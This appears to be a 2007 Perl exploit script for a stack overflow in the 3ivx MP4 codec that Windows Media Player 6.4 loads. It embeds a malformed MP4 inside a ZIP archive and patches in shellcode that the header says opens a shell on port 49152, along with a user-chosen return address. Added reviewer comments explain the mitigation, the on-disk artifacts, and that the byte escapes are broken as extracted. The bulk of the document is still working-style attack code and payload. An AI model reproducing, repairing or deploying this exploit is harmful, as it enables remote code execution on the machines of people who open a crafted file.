wmp-overflow.txt
Posted on 09 December 2007
#!/bin/perl
#
# Windows media player 6.4 MP4 Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Shell on port 49152
#
# usage:
# - download this codec in order to manage MP4 content:
# http://www.3ivx.com/coral/3ivx_d4_451_win.exe
#
# - open the MP4 file with mplayer2.exe
#
# SYS 49152
# gforce(put the @ here)operamail(put the . here)com
#
# update:
# the latest 5.0.1 codec is still vulnerable
#
# Review notes (defender's reading of this 2007 PoC):
#   - The vulnerable component is the third-party 3ivx MP4 codec that
#     mplayer2.exe loads, not the player itself: the overflow is reached
#     through the codec and the return address the script prompts for is a
#     "pop edi, pop esi, retn" sequence inside 3ivx.dll (see the prompt text
#     below).  Removing or blocking that codec is the direct mitigation; the
#     author's update says 5.0.1 was still affected at posting time.
#   - On-disk artifacts this script produces: tempzip.zip and
#     SYS_49152_MP4_for_mplayer2.mp4 in the current working directory.  The
#     header claims a shell on TCP port 49152; if that is accurate,
#     mplayer2.exe opening a listening socket after parsing an MP4 is the
#     host-level observable.
#   - As extracted here the listing is not runnable: every "\x.." escape in
#     the byte strings has lost its backslash (they read as plain ASCII such
#     as "x50x4B..."), the header comments were collapsed onto the shebang
#     line, and the script runs without strict/warnings.  Hashes of this text
#     will therefore not match the original file.

use Archive::Zip qw( :ERROR_CODES :CONSTANTS );   # :ERROR_CODES is imported but no AZ_* status is ever checked below

# Embedded ZIP archive holding a single member, SYS_49152_MP4_for_mplayer2.mp4
# (the member name is readable as ASCII in the 3rd/4th strings; the local
# header PK\x03\x04, central directory PK\x01\x02 and end record PK\x05\x06 are
# all visible as x50 x4B ...).  The member is the malformed MP4 that triggers
# the overflow; the payload and return address are patched into it afterwards.
$zip_data = # code 724982
"x50x4Bx03x04x14x00x00x00x08x00x56xACx3Fx36xC5".
"xE1x2Ex98x9Ax0Ax00x00x5CxC2x01x00x1Ex00x00x00".
"x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66".
"x6Fx72x5Fx6Dx70x6Cx61x79x65x72x32x2Ex6Dx70x34".
"xEDxD7x0Bx70x54xD5x19x07xF0xB3x9Bx8Dx80x10x26".
"x55x21x6Ax29x46x40x4Dx7DxA4x9Bx4DxC8x83xA1x1A".
"x62x72x49xD1x00x05x12x23x89x81x65x77x21xCBx66".
"xB3xC9xEExE6x85x80x81x28x06x8Cx96x47x78x09xD4".
"xA0xA0xC4x32x3ExA0x15x47xA7x45xC6x22xA6x2Ax56".
"xADxF5xD1x8Ax15x15xA5x5Ax85x98x89x05x5FxFDx4E".
"xEEx7FxDDx55x47x4Bx47xC7x8ExFAxFFxE9xC7x39xBB".
"xF7xDExF3xF8xCExBDxE7x66x95x52xC9xB3xC3x4Dx35".
"x45x19xE3x92x95xD0xA5xBFx26xC3xE1x0Dx05xFCxFA".
"xB3xB2x74x25xF9x03x81x7AxA9x55xF9xEBx2BxDDxFA".
"xABxDDx25x3Fx39xB6xA7x72xFAx21xA5xACxA5x4Ax9D".
"xB7x58x59x94xFEx3FxEAx33x1FxBExF8x39x57x7Dx25".
"xABx52x09x1DxE1xA0xD3x27xF5xF2xB0xAFxAFxCFx7E".
"xBAxCFxDDx25xC3x2DxD1xD6xA4xDFxCFx77xF1x3FxF5".
"x9Bx30xD6xEFxF6x3AxA5x92xECx77x47xE7x65xF6xB1".
"x3Dx5Fx0Dx2Cx55xC5x7FxECx3BxF1xECx4Ax77x55x30".
"x72x55x28x50x57xFDxB9x5Ex06xBDxE7xF7x56xCFx96".
"x4Ax62xC8x6Fx36x04xA3xDCxE6xF7xC3xDCx41xCFxEC".
"x98x21x0DxAAx0Bx56x25x9BxF5x41xBBx42xE1x59x55".
"x52x9Fx13x0Ax87xDCx31xE7x5Cx21x8BxE0xFCxC2x34".
"xACx2Ax51x17x32x3Cx2DxDDx13x72x87x74x25xAExB9".
"xB9x79x84x94x36x29x4FxCBx1DxA2xACx43x95x75xEC".
"x36x65xE9x7Ex2Cx5ExBExB1x9Ex92x78x92x14x16xC9".
"xABx3Ax3Dx14x0Ex87xA2xCDx5AxFFx2Ax17xE9x7Ax8A".
"x74xEFxFAxB4x13xB3xCBx21x28x47xEAx21x9BxF5x81".
"x55x72xDExBCxE8x0CxF5xF5xAAxDFxB7x14x4FxC8x10".
"x3Ex94x78x4Fx42xD7x77x4AxFCx45x62xBBx44xB3x84".
"xACx91x65x09x8Ex6Dx91xB8x43xE2x5Ex89x0Dx38x77".
"x9Dx84xDCxB3x16x19xBFxE5x16x89x36x89x3Bx25x24".
"xCDx96xF9x12x4FxE2xF3xAFx24x36x22x9Ex95x78x59".
"x62x81xC4xEFx25xCAx25x66x49xECx42x9FxB2xACx96".
"x22x89xB5x12xF2x8Cx58xF6xA1x7Ex2DxEAxCBx25xEE".
"x96x58x23x21xF9xB5xDCx24x51x23x51x68xF6x6Fx3D".
"x59xCAx26x89xA9x12x25x68x2Bx5Dx62xA9x84x17xE7".
"xD6x49x84x25x0Cx89x3Dx38xFFx25x89xD7xF0xFDxE5".
"x12x73x10x41x94xF3x62x4Ax37xDAxD1xE3xBEx46xC2".
"x83xF3xF4xFCx57x20x16x49xDCx2CxB1x43xE2x3AxC4".
"x0Ax8CxBBx1DxB9x5Cx87xFAx6Fx70xAExCExC7xABx12".
"xC7x31xC7x95x98x9Fx1Fx79x89xE4x4Ax8Fx73x31xAE".
"xFDx2DxCAxDFx49xBCx2Dx71x40x62x35xC6x37x37x66".
"x2Dx1Fx91x78x00xF9x0Fx62x8Dx1Ex96x98x89xF6xAB".
"x91xEFx0DxC8x53x03xD6x5ExB7x7DxB5xC4x2AxE4xE9".
"xEFx12xFFxC4x5Ax2ExC5x38xF4xFAx36x4Ax74x4Ax5C".
"x8FxF3x57x60x0Ex95x18x87x07xD7xD7x21x87xDExCF".
"xCDx4BxF6x26x4BxABx44x87xC4x36x94xFAxBAx85x38".
"xBFx1Ax9Fx67x63x6CxB5x68xB3x4BxE2x6Fx18xC7x22".
"xF4x1Fx42xBEx97x21x5Fx3ExACx59x10xEDx34x63xDD".
"xE6xE0xBAx6Bx31x57x7Dx6Fx3FxADxCCx7Bx79x31x72".
"x7Fx0Dx42x5Fx13xC6xBCx17xA0xFDxF9x68x57x1FxDF".
"xAFxCCx67xE1x6DxCCx2Bx88xF3x3Dx18x73x08x7DxEB".
"x3ExCBxF0xBDx5Cx2Bx1Bx8BxB9x5Ex0Bx31xBFxCAx98".
"x73xCBx70x7Ex1Dx72x3Ax2Fx66xACxF3x51x5Fx8AxCF".
"x7Ax9DxEFx97xB8x15x63x5Cx8DxB9xE8xF1x5Cx85x6B".
"xFFx85x75x9Cx87xF5xD2xF7x4Ax40x99xCFx91x07x39".
"xBDx3Ax66x7Ex3Ax97x1BxD0x57x18x39xD0xF7xD0xAB".
"x38xB7x16x6BxF1x9Cx32xEFxE7x76xE4x4CxDFx23x2B".
"x91xFBx46xCCxC9x17x73x4Dx13xFAxF3xE1x7Cx7DxAE".
"x7Ex4Ex6Ex97xB8x51x99xF7xCEx53x98x8Fx1Ex83xDE".
"x43x1Ex54xE6x33xA2xEFxB1x16x89x83x98x6Bx15x72".
"x1DxC0xBCxD6x61x3Dx36x21x07x0Dx18xFBx5ExB4xF3".
"x3CxD6x76x21xE6xA8xD7xBAx15xE3x8Ax3CxCFx8Fx23".
"xFFx0DxC8xFFx2Cx94x7ExCCxC7x8DxB1xD7x60x6Ex01".
"x44x4DxCCx5Ax5Fx89xF5x69xC0x18x9Bx50xDFx86xF1".
"x2FxC7xBCx75x3BxF7x49x4CxC6xDCxDDxC8xE3x38x8C".
"x77x22xD6xF8x12xE4xEAx5Ex7Cx97xA3xCCx67x44xEF".
"xC3x3Fx97xB8x58xE2x1Ex89x6CxB4xAFxE7x5Fx8Cx75".
"xD1x73x2Ax45x2Ex2Bx70xBEx5Ex7Bx2FxE6x96xA9xCC".
"x7Bx26x13xF9xE8xC1x3Ax1BxC8x43xAExC4x74x89x11".
"x18x9BxCEx67x0AxFAx5Fx8Ex7CxEAx3Dx56xDFx1Fx6B".
"x90xCBxB9xB8xB6x16x39xD3xB9x99x81xEFx9Bx90x73".
"xBDx6ExFAxDEx6Ax43x79x0ExD6x58xD7xFFx8Cx5CxBC".
"xA3xCCx7DxBFx16xF9x7Cx04x79xD8xAAxCCx3DxCCx8D".
"xBCx36xC5xACxEBx2BxC8xB9xBExC7x66xAAxE8x9Ex51".
"x83x35xD4xFBx55x81x32xF7x3Bx3FxAExD3xC7x17xE1".
"xBBx1BxD1x97x8Ex51xF2x9ExFCx40xCAx91xC8x81xCE".
"x91x43x22x49xA2x3FxC6xE0xC1x75x37x63x9Cx8FxCA".
"x73x6Dx41xFExF4x7DxA3xF7x21x7Dx4Fx2DxC1x5Ax36".
"x23x27x3Ax77x01xF4xB7x18x9Fx17x22xAFxFAx39xBC".
"x12x6Dx57xA2x5CxA4xA2x7Bx4Ax64x4FxBAx1Ex75x2F".
"xC6x57xA9xA2xF7x9AxCExF5x24xE4x7Dx26xD6x7Ax06".
"x8Ex4FxC4xE7xC8x3Ex5Ax87x5CxFAxD1x46x0BxDAxD4".
"x6BxA8xDFx47x67x49xE4xA1x3DxFDx4Ex8DxC3x1CxF4".
"xFDxFCx2ExF2xA3xF3xACxF7x8Ex72xB4xA7xEFx6DxBD".
"xF7xBCxA8xCCxF7x53x21xDAx98x80xF9x85xB0xD6xB3".
"x55x74xEFxB9x09xDFxB7xAAxE8xFEx3Dx17xB9xB9x01".
"xE3xAAxC3xB1x05x98x4Fx33xF2x77x0DxAExF3xA1xAD".
"xC5x2AxFAxECxEAx3DxEEx3Ax15xDDx67x1BxB1x1ExEB".
"x71x5Dx0BxBExD3x7BxCFx26xACx7DxE4xEFx9Ax6Ax8C".
"xABx59x45xEFx5Dx7Dx2Fx05x91x23x1Dx57x60x3Cx7E".
"xC4xD5x2AxBAx2Fx35x62x8Ex01xF4x35x13xEBx73x05".
"xD6xD8xA7xA2xEFx09xBFx8AxEExC9x57x61x0Ex01xCC".
"xC1x83xE3xB1xF7x42x23xFAx5Fx1Cx33xF7xF9x18x4B".
"x10xE3x95xE7x4Bx1DxC7x98xCAx90xBFx46xF5xE9x5E".
"xA6x7Ax91x4Fx7DxFFxEAxFBx59xEFx9BxFAx5Ex5Ax83".
"x6Bx22xCFxAFx0Fx63x89x3CxDFx2DxC8xEFx92x98x39".
"xD6x23x77x91xB5x5Dx8Ax71x84xD0x47xE4x3Dx1DxD9".
"xA3x6ExC6xF5x7Ax6Dx6ExC7xB8x17x20xD7xBAx9DxC8".
"xFBx3CxF2x37x65xECxFBxB1x09xFDx96xA3xAEx73x54".
"x85xF6x9Bx90xABx06xACxB9x7Cx56x1Bx43x61x57x00".
"x7Fx68x8Fx94x3Fx1Dx2Ex91x78x5AxFEx9CxCAx55xD6".
"x93x12x94xF5x9Cx63xCAx9Ax7Fx40x59x3Dx15xCAx7A".
"x7DxABxB2x6Ex2Bx54xD6x47xADxCAxFAxC6x11x15xD7".
"x6FxB3x8Ax3BxEFx80x8Ax1Bx7Fx83x8AxABx1CxABxE2".
"x5AxD7xA9xB8x3Bx2Fx57x71x7FxBAx43xC5x1DxBEx50".
"xD9xFAx1Dx53xB6x73xFFxADx6CxF9x0Fx2Bx9BxA7xBF".
"xB2x5Dx9BxA8x6Cx9Bx8Bx95xEDxA1x6Ax65x7BxA9x5B".
"xD9x3Ex2Cx54xF1x67xBExA9xE2xC7xA4xA9xF8xD2x37".
"x54x7CxFDx0Ex15xDFxDExA6xE2x77x96xA8xF8xA7x5F".
"x96xD7x5Bx5Cx9Dx3BxECx94x6DxF7x03xBFx27x1CxF9".
"x99xF2x99xDFx49xF2xDBx2AxE8xACxA9xA9x8AxFEx56".
"xB0xECx3CxECx95x9Fx0FxF2x4Ex78xA0xB3xDAxE9x97".
"x72x87xDBxD9x77x71xDFxEFx9Bx49xF5x9Ex60xB8x2E".
"xE8x49x73xA4x67x8CxCExCCxCAxCExB1x3Bx43xF1x56".
"x8Bx71x91xC5x62x14x1AxCDxB9x86xFExAFx79x99x59".
"x34x9BxC5x30xB3xB0x99xC5x40xB3xE8x2ExF8xFAx72".
"x0Bx26x17x94x15xE4x5ExDAxFFx58xB8xF5xADx0BxBA".
"x5Ax0ExDFxF3xC2x3Bx2Fx84x47xF5x94x2Dx0Ax9DxFA".
"xC8xF4x8Dx9Bx5BxDExFAxF0x60xCFx18x7BxC3xDBxA9".
"xB7xB9x2Ax72xC6x24x3Dx71x70x61xD2x6BxC7x9FxFA".
"xC7x96x3Fx94x85xCEx5Fx9Ax97xF4xF1xA1xB2x86x37".
"x8BxAAx93x3Ax52x7CxE5xD9x73x0Fx94x3FxBBx67x43".
"xC9xF6x7DxEBx1Ax8Ax3Fx1Ax7CxFFxD2x9DxBBx93x3E".
"x3Ex58xD6xB0xAFxA8xE4xB9xF3xD7x1Bx9Bx26xECxAD".
"x4Fx4AxB9x73x61xF3x43xF1xBExF1x7Bx8BxCExD8x7E".
"xFEx92x92xA4xA7x5Ex7Cx3FxE9x95xFDxB6x9Ex9FxB5".
"x4ExABx39x9AxD3x76xBCxBBxC3x71xF7xAAxBBx2Ex7A".
"x77xD5xFAxC1xAExDAxBBx56xD4x5ExF5xD1xC9xAEx86".
"xF5xCFx34xEDx1BxBFxABxFDxB6x55xF6x5Fx57x0Cx75".
"x14x6Cx4Bx7FxFFxB1x8AxC4x01x4Fx76xAFx1ExF0x72".
"xF7x75x03x5CxB5x1Dx8ExF2xCDx1Dx03x86xE4x4Ex75".
"x64x3Fx78xDFx26x39x66x6Fx3BxB2x6AxEBxE5x5DxB3".
"xDExDFx51xB8x62xEBx84x6Ex5Dx1Fx79xEAx99x6Fx4A".
"xFDxE8xCAxC1x5Dx15x43xBBx7Ax8CxDDx1Bx5FxEFxCD".
"x69x93xFAxD8xDExBDx1Dx8Ex4Fx1Ex9FxB4xBBxF7xE8".
"x2DxA1xC9x29x67xDBx9Fx4Fx19xE5x2Bx9Fx52xB5xE5".
"x40x5BxF6xE9xF7x38x2Ex4BxDEx72xB2xFFx68xCFx33".
"xD9x87x97x55xECx1CxEEx6AxD8x94xB0xFFxC8xDAx81".
"xBDx1Dx6Bx07x76x1DxC9x59xD6x33xE8xACx19x53xBA".
"x73xDAx7Ax2Bx72xFCxAExDAxA2x84x99x23xACx17xBB".
"x1AxDAxA5xBFx9FxB6xCFxDFxB3x7AxEBx84x8AxA1x92".
"xC4x61xDFxC0x42x7DxB3x0Cx22xA2xEFx84x5CxE3xEE".
"xFDx46x89x51x6AxC4x0Fx30x5Fx93x93x8Dx32x23x3E".
"xD1xACxCBx8BxF0x13xF9xA7xD0x30x5Fx9Cx85x5Fx1A".
"xB6x2Fx3Bx30xD5xB0x95xBEx6Ax5Cx6Ax5CxF6x75xE2".
"xD0xA1x43x27x32x95x13x3Ax89x88xBExBBx0AxB5xFF".
"xF7x20x88x88x88x88x88xE8x7BxA9x98x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88xE8x87".
"xA0x94x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x88".
"x88x88x88x88x88x88x88x88xBEx57x8Ax89x88x88x88".
"x88x88x88x88x88x88x88x88x88x88x88x88x88x88x7E".
"x38x66x12x11x11x11x11x11x11x11xD1x7Fx51x40xDF".
"x9Ex34xA5xD4xB9x9DxE3xA6x4Cx93x72xB8xDBx19x76".
"x4Ax69x91x50x93xBDxF3xE6x79x5DxCEx70x20xD9xF0".
"xD6x7BxE4x8BxE4x4Ex67xD5x2Cx29x4Fx8Fx3Dx6Bx52".
"xBDx27xE8x0Ex84xF4xF1x33xE7x54x07x75x79x0Ax8E".
"x9Bx06xEBx2BxC3x41x5Fx75xCCx95x11x16x95xD0x57".
"x0Ex77x7Bx43x3Ex29x87x7ExE1xB8xEEx63x58xA7xDB".
"xD9x24xE5x69xB1xFDx3AxECx76xBBx14x67xB8x6AxBC".
"x55x52xFEx08xC7x86x44x2ExCDxE9x0Cx07x02x52xA6".
"xC5x5ExE4x9Dx56x57xEDx09x25xD7x67xA4x66xA5xA6".
"xA5xA6xDBx2Fx4CxFEx65x9DxD7xE5x9BxE6xF5x7Bx92".
"x33x53x47xA7x3AxE4x9Cx5Bx2Fx12xBAx57xBFxC7xA9".
"xC7xACx5Cx01x7FxAAxB3xA6xA6xCAx93x6Ax5ExAEx47".
"x52xEDxF4x7Bx22x0Dx4Ex9Cx34xA5x48xAAx73x63x3B".
"x4AxB6xF7xC9xCAxF8x6Cx25x2DxD3x9Ex6Ex7Ex93x53".
"x60x37x2BxD9x19x38x27xCBxEExE8xABxA4x8FxCEx33".
"xCCx4Ax5Ax96x79x4Ex9Ax23x3Dx1Fx95xD1x19xD2x78".
"xD3x09x8CxF0xC7xB1x23xF4x84x66x5Cx9Ax9Fx9Fx37".
"xE3x17xF9xFAxD0x98xD8x81xA6xA5x5Fx60x14xE4x67".
"x66x67x39x8Cx82xBCxD1x79x0Ex23x2Fx23x2Fx7Bx5C".
"x46x5Ax66x46x76x81xC3x9Ex61x64x8ExCBxBBx20xC7".
"x9Ex9DxEDx90x8Ex4Fx7Ax7Dx76xD0x23x8DxFEx07x50".
"x4Bx01x02x14x00x14x00x00x00x08x00x56xACx3Fx36".
"xC5xE1x2Ex98x9Ax0Ax00x00x5CxC2x01x00x1Ex00x00".
"x00x00x00x00x00x00x00x20x00x00x00x00x00x00x00".
"x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66".
"x6Fx72x5Fx6Dx70x6Cx61x79x65x72x32x2Ex6Dx70x34".
"x50x4Bx05x06x00x00x00x00x01x00x01x00x4Cx00x00".
"x00xD6x0Ax00x00x00x00";

# Payload bytes written over the extracted MP4 at offset 3875 (see the first
# seek below).  They are opaque to this script: nothing here decodes or
# parameterises them, and the header's "Shell on port 49152" is the only
# statement about what they do.
my $shellcode = # code 724982
"x2BxC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xC6x5Ax9CxA1x83xEBxFCxE2xF4x3Ax30x77xECx2ExA3".
"x63x5Ex39x3Ax17xCDxE2x7Ex17xE4xFAxD1xE0xA4xBE".
"x5Bx73x2Ax89x42x17xFExE6x5Bx77xE8x4Dx6Ex17xA0".
"x28x6Bx5Cx38x6AxDEx5CxD5xC1x9Bx56xACxC7x98x77".
"x55xFDx0ExB8x89xB3xBFx17xFExE2x5Bx77xC7x4Dx56".
"xD7x2Ax99x46x9Dx4AxC5x76x17x28xAAx7Ex80xC0x05".
"x6Bx47xC5x4Dx19xACx2Ax86x56x17xD1xDAxF7x17xE1".
"xCEx04xF4x2Fx88x54x70xF1x39x8CxFAxF2xA0x32xAF".
"x93xAEx2DxEFx93x99x0Ex63x71xAEx91x71x5DxFDx0A".
"x63x77x99xD3x79xC7x47xB7x94xA3x93x30x9Ex5Ex16".
"x32x45xA8x33xF7xCBx5Ex10x09xCFxF2x95x09xDFxF2".
"x85x09x63x71xA0x32x5CxA1xA0x09x15x40x53x32x38".
"xBBxB6x9DxCBx5Ex10x30x8CxF0x93xA5x4CxC9x62xF7".
"xB2x48x91xA5x4AxF2x93xA5x4CxC9x23x13x1AxE8x91".
"xA5x4AxF1x92x0ExC9x5Ex16xC9xF4x46xBFx9CxE5xF6".
"x39x8CxC9x5Ex16x3CxF6xC5xA0x32xFFxCCx4FxBFxF6".
"xF1x9Fx73x50x28x21x30xD8x28x24x6Bx5Cx52x6CxA4".
"xDEx8Cx38x18xB0x32x4Bx20xA4x0Ax6DxF1xF4xD3x38".
"xE9x8Ax5ExB3x1Ex63x77x9Dx0DxCExF0x97x0BxF6xA0".
"x97x0BxC9xF0x39x8AxF4x0Cx1Fx5Fx52xF2x39x8CxF6".
"x5Ex39x6Dx63x71x4Dx0Dx60x22x02x3Ex63x77x94xA5".
"x4CxC9x29x94x7CxC1x95xA5x4Ax5Ex16x5Ax9CxA1";

# Materialise the embedded archive in the working directory.  Bareword
# filehandle and 2-arg open (the filename is a fixed literal, so there is no
# mode injection here); print and close are unchecked, so a short or failed
# write would not be noticed before the archive is read back.
open(code, ">tempzip.zip") || die "Can't Write temporary File ";
binmode (code);
print code $zip_data;
close (code);

print " Temporary file ready, patching.. ";

# Archive::Zip->read and ->extractMember return status codes (the :ERROR_CODES
# import above provides the AZ_* constants), but neither result is checked:
# a failed read/extract only surfaces as the open() below dying.
my $zip = Archive::Zip->new();
$zip->read( 'tempzip.zip' ) ;
$zip->extractMember( 'SYS_49152_MP4_for_mplayer2.mp4' );

# Reopen the extracted MP4 in read/write update mode and patch bytes in place.
open(code, "+<SYS_49152_MP4_for_mplayer2.mp4") || die "Can't Open temporary File ";
binmode (code);

# Whence 0 = absolute offset from the start of the file.  The payload is
# overwritten at byte 3875; the seek and print results are not checked.
seek code,3875,0;
print code $shellcode;
print " Shellcode added.. ";

# Second patch point: a single byte of the return address at offset 5566,
# supplied interactively.  The prompt text documents that the value is one byte
# of a gadget address inside 3ivx.dll, i.e. the codec DLL is both the
# vulnerable component and the control-flow target.
seek code,5566,0;
print " Chose a good return address: The right way would be to attach a debugger to mplayer2.exe ";
print "and find the address of the pop edi, pop esi, retn sequence inside 3ivx.dll, ";
print "to get the second byte, but usually a value between 0xC6, 0xED or 0xCE should work.. 
";
# The STDIN line is passed to hex() without chomp or validation.  hex() stops
# at the first non-hex character, so the trailing newline is tolerated and any
# non-hex input silently becomes chr(0).  $a is the package global that sort()
# also uses; it is assigned here without `my` because the script runs without
# `use strict`.
print code chr(hex($a=<STDIN>));
print " Address added, have fun! ";
close (code);   # unchecked close on a write handle: buffered write errors are lost

#indeed this sploit could have been written better without the ret address hassle,
#but it's intended to be only a POC, not a weapon for kiddies..